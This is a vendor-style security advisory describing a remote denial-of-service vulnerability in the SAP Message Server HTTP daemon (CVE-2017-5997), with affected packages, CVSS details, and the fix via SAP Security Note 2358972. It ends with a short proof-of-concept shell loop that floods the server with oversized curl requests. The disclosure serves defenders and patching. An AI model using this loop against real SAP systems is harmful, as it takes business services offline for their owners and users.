ERPScanERPSCAN-16-038SAP Message Server HTTP remote DoS
EPSS
Percentile
66.3%
Application: SAP KERNEL **Versions Affected:**SAP KERNEL 7.21-7.49 Vendor URL: SAP **Bugs:**Denial of Service **Reported:**18.08.2016 **Vendor response:**19.08.2016 **Date of Public Advisory:**08.11.2016 **Reference:**SAP Security Note 2358972 Author: Mathieu Geli (ERPScan)
VULNERABILITY INFORMATION
Class: Denial of service
Impact: direct impact on availability
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVE-2017-5997
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
Description
The SAP Message Server HTTP daemon doesn’t clean its memory upon client connections in a certain case.
Business risk
An attacker can exploit a Denial of Service vulnerability to terminate a process of a vulnerable component. Thus, nobody will be able to use the service, which, in its turn, affects business processes, system downtime, and business reputation of a victim company.
VULNERABLE PACKAGES
KERNEL 7.21
KERNEL 7.42
KRNL32NUC 7.21
KRNL32NUC 7.21EXT
KRNL32NUC 7.22
KRNL32NUC 7.22EXT
KRNL32UC 7.21
KRNL32UC 7.21EXT
KRNL32UC 7.22
KRNL32UC 7.22EXT
KRNL64NUC 7.21
KRNL64NUC 7.21EXT
KRNL64NUC 7.22
KRNL64NUC 7.22EXT
KRNL64NUC 7.42
KRNL64UC 7.21
KRNL64UC 7.21EXT
KRNL64UC 7.22
KRNL64UC 7.22EXT
KRNL64UC 7.42
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2358972.
TECHNICAL DESCRIPTION
The message server doesn’t free properly the resources allocation for handling the clients request in the case where the requests size is between 4k and 65k. In this special case, the server answers with an empty reply as opposed to the case where the request is greater than 65k, then the server will reset the connection. The following shows log of the msgserver process being killed because of too much memory allocated:
[4721576.189056] Out of memory: Kill process 14223 (ms.sapJ45_SCS01) score 243 or sacrifice child [4721576.189058] Killed process 14223 (ms.sapJ45_SCS01) total-vm:3321508kB, anon-rss:2468184kB, file-rss:0kB
1
2
|
[4721576.189056] Out of memory: Kill process 14223 (ms.sapJ45_SCS01) score 243 or sacrifice child
[4721576.189058] Killed process 14223 (ms.sapJ45_SCS01) total-vm:3321508kB, anon-rss:2468184kB, file-rss:0kB
—|—
Proof of Concept
while true; do curl <ipmsserver>:<porthttpms>/msgserver/group?group=$(python -c “print ‘A’*65000”) done
1
2
3
|
while true; do
curl <ipmsserver>:<porthttpms>/msgserver/group?group=$(python -c “print ‘A’*65000”)
done
—|—
Related
